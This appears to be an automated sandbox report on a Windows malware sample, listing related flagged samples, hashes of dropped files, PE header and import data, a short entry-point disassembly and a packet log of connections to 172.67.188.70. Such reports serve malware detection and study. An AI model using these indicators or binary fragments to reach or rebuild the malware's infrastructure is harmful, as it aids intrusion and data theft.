                                                          D6EC737D10AFDAF38CAFEDE9FDE045DD3CE7BC72C6EE1.exeGet hashmaliciousBrowse
                                                          • 104.21.14.22
                                                          Aging Report- 2022-09-09.htmGet hashmaliciousBrowse
                                                          • 172.64.151.252
                                                          xeAdJMYxDh.exeGet hashmaliciousBrowse
                                                          • 162.159.135.233
                                                          att00001.htmGet hashmaliciousBrowse
                                                          • 104.17.25.14
                                                          http://d3tj3fjg3l5nou.cloudfront.netGet hashmaliciousBrowse
                                                          • 104.18.10.207
                                                          https://olympusrecycling.app.box.com/notes/1010892062645?s=x8r7htkjatwhauutbymx99kv1m82ijp2Get hashmaliciousBrowse
                                                          • 104.16.74.20
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          ce5f3254611a8c095a3d821d44539877Zo1xtSXZlk.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          T6xpysWstk.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          XctsJI6goQ.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          zJ4wlxHSQC.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          a93IbHxhkr.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          tyn5NShpzv.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          6rZU1nB4gy.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          Pf1JZr4ARr.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          w3PM15wwfI.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          AcsQ6kzq08.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          Y9RTzpecAc.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          WYvwwbU75s.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          lYyz6H76eF.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          pPgwL4LrJ3.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          XWn97j26Ma.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          pcvln7hAnh.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          HcrZfKeDLI.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          • 104.21.40.196
                                                          No context
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:true
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                          Category:dropped
                                                          Size (bytes):28672
                                                          Entropy (8bit):1.4755077381471955
                                                          Encrypted:false
                                                          SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                          MD5:DEE86123FE48584BA0CE07793E703560
                                                          SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                          SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                          SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                          Malicious:true
                                                          Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):571230
                                                          Entropy (8bit):7.964579681710588
                                                          Encrypted:false
                                                          SSDEEP:12288:FV1e0UgkVT6ZT+3JCnoxgLSoCXwbePLJrH8fwpZ:FV1edgkV8T0CnoxX4ePLJTMwpZ
                                                          MD5:6F5100F5D8D2943C6501864C21C45542
                                                          SHA1:AD0BD5D65F09EA329D6ABB665EF74B7D13060EA5
                                                          SHA-256:6CBBC3FD7776BA8B5D2F4E6E33E510C7E71F56431500FE36DA1DA06CE9D8F177
                                                          SHA-512:E4F8287FC8EBCCC31A805E8C4CF71FEFE4445C283E853B175930C29A8B42079522EF35F1C478282CF10C248E4D6F2EBDAF1A7C231CDE75A7E84E76BAFCAA42D4
                                                          Malicious:false
                                                          Preview:P,..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):61440
                                                          Entropy (8bit):5.463972317214072
                                                          Encrypted:false
                                                          SSDEEP:768:WDKKrolwgA7W2cz1Pii4A1yZHtVtQg0eBU:KKPi2Fii4TrtQg0e
                                                          MD5:4D11BD6F3172584B3FDA0E9EFCAF0DDB
                                                          SHA1:0581C7F087F6538A1B6D4F05D928C1DF24236944
                                                          SHA-256:73314490C80E5EB09F586E12C1F035C44F11AEAA41D2F4B08ACA476132578930
                                                          SHA-512:6A023496E7EE03C2FF8E3BA445C7D7D5BFE6A1E1E1BAE5C17DCF41E78EDE84A166966579BF8CC7BE7450D2516F869713907775E863670B10EB60C092492D2D04
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)a..H..H..H..r.H..a.H..b..H..oGR.H..H...H..}.H..u.H..w.H..Rich.H..........PE..L....^.c...........!.....p...p..........................................................................................b.......(........&.......................................................... ...@............................................text....g.......p.................. ..`.rdata........... ..................@..@.data...............................@....rsrc....0.......0..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):3444
                                                          Entropy (8bit):5.011954215267298
                                                          Encrypted:false
                                                          SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                          MD5:B133A676D139032A27DE3D9619E70091
                                                          SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                          SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                          SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                          Malicious:false
                                                          Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                          Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):3444
                                                          Entropy (8bit):5.011954215267298
                                                          Encrypted:false
                                                          SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                          MD5:B133A676D139032A27DE3D9619E70091
                                                          SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                          SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                          SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                          Malicious:false
                                                          Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                          File type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.028570145865521
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:file.exe
                                                          File size:73728
                                                          MD5:338057ba65f786f4238be340d64daf08
                                                          SHA1:6571744dbdf2150179e46fbf4de2ce8ba715cbf2
                                                          SHA256:bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
                                                          SHA512:37e2a8a12dab1481bcb60fa8afdc9613cbff8e5d873754e3c6142e882d742c0f9ea19f1bac6ce1f6644b3e1c1022a7aab73105f53c2ccf4e9a71405fac89de34
                                                          SSDEEP:768:f098UHbSVbERlm86g6yua4r+Z3KY0GHg37b8/mvl9sl5OliH2EyY7tAYMxR:fi8UYbE8w4N73E/mcz0atAYM/
                                                          TLSH:4A734C1978438833E4424875C6D586C15BFE7D6333E760AFEFA81ACD5AA02D80676BF1
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.v.!.v.!.v...). .v..N..5.v..N....v..N..z.v...+.&.v.!.w.F.v..N..#.v..N.. .v.Rich!.v.........PE..L....v.c...................
                                                          Icon Hash:00828e8e8686b000
                                                          Entrypoint:0x401a12
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows cui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:
                                                          Time Stamp:0x631D76A4 [Sun Sep 11 05:48:20 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:a539b33d7ef3adce7c1bcaac987684e3
                                                          Instruction
                                                          call 00007F573CBF78B7h
                                                          jmp 00007F573CBF4BE6h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000328h
                                                          mov dword ptr [00410198h], eax
                                                          mov dword ptr [00410194h], ecx
                                                          mov dword ptr [00410190h], edx
                                                          mov dword ptr [0041018Ch], ebx
                                                          mov dword ptr [00410188h], esi
                                                          mov dword ptr [00410184h], edi
                                                          mov word ptr [004101B0h], ss
                                                          mov word ptr [004101A4h], cs
                                                          mov word ptr [00410180h], ds
                                                          mov word ptr [0041017Ch], es
                                                          mov word ptr [00410178h], fs
                                                          mov word ptr [00410174h], gs
                                                          pushfd
                                                          pop dword ptr [004101A8h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [0041019Ch], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [004101A0h], eax
                                                          lea eax, dword ptr [ebp+08h]
                                                          mov dword ptr [004101ACh], eax
                                                          mov eax, dword ptr [ebp-00000320h]
                                                          mov dword ptr [004100E8h], 00010001h
                                                          mov eax, dword ptr [004101A0h]
                                                          mov dword ptr [0041009Ch], eax
                                                          mov dword ptr [00410090h], C0000409h
                                                          mov dword ptr [00410094h], 00000001h
                                                          mov eax, dword ptr [0040F020h]
                                                          mov dword ptr [ebp-00000328h], eax
                                                          mov eax, dword ptr [0040F024h]
                                                          mov dword ptr [ebp-00000324h], eax
                                                          call dword ptr [0040C058h]
                                                          Programming Language:
                                                          • [ASM] VS2005 build 50727
                                                          • [C++] VS2005 build 50727
                                                          • [ C ] VS2005 build 50727
                                                          • [LNK] VS2005 build 50727
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe2340x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000xb0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xde200x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0xc0000x158.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000xadcc0xb000False0.6025834517045454data6.690353602080156IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0xc0000x28e40x3000False0.3294270833333333data5.064876536458888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xf0000x21d40x2000False0.2056884765625data2.172494232850921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x120000xb00x1000False0.040771484375data3.0557964218222446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountry
                                                          RT_MANIFEST0x120580x56ASCII text, with CRLF line terminatorsEnglishUnited States
                                                          DLLImport
                                                          KERNEL32.dllMultiByteToWideChar, RaiseException, GetProcAddress, LoadLibraryA, GetEnvironmentVariableW, lstrcatW, LocalFree, GetThreadLocale, LCMapStringW, WideCharToMultiByte, LCMapStringA, GetStringTypeW, GetStringTypeA, GetLastError, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapDestroy, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSection, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, InterlockedExchange, GetLocaleInfoA
                                                          USER32.dllFindWindowA, wsprintfW
                                                          OLEAUT32.dllSafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetDim, VariantCopy, VariantClear, VariantInit, SysAllocStringByteLen, SysStringByteLen, SysAllocString, SysFreeString, SysAllocStringLen, GetErrorInfo
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 11, 2022 10:16:23.900734901 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:23.900787115 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:23.900912046 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:23.917438030 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:23.917479992 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.004534960 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.004710913 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.011389017 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.011408091 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.012128115 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.066070080 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.514329910 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.555376053 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993163109 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993236065 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993271112 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993307114 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993339062 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993371010 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993380070 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.993406057 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.993434906 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.994070053 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.994113922 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.994147062 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.994172096 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.994179964 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.994193077 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:24.994231939 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.994266033 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:24.994277000 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.035010099 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.208559990 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208641052 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208684921 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208723068 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208731890 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.208759069 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208775997 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.208817005 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208853006 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.208862066 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208893061 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.208926916 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.208934069 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.209172010 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.209209919 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.209218979 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.209280014 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.209314108 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.209320068 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.209331036 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.209364891 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.212543011 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212610960 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212652922 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212688923 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212697983 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.212721109 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212739944 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.212768078 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212810040 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212811947 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.212826967 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.212866068 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.212877989 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.253787041 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.253815889 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.300635099 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.426436901 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426525116 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426567078 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426644087 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426690102 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.426697016 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426727057 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426753044 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.426779032 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426789999 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426800966 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.426841974 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426857948 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.426866055 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426891088 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426903009 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.426932096 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.426935911 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.426981926 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436301947 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436398029 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436454058 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436466932 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436486959 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436499119 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436520100 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436534882 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436559916 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436609030 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436633110 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436680079 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436692953 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436728001 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436741114 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436754942 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.436767101 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.436793089 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.437781096 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.437822104 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.437879086 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.437891006 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.437911987 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.488059044 CEST49724443192.168.2.3172.67.188.70
                                                          Sep 11, 2022 10:16:25.644522905 CEST44349724172.67.188.70192.168.2.3
                                                          Sep 11, 2022 10:16:25.644551992 CEST44349724172.67.188.70192.168.2.3
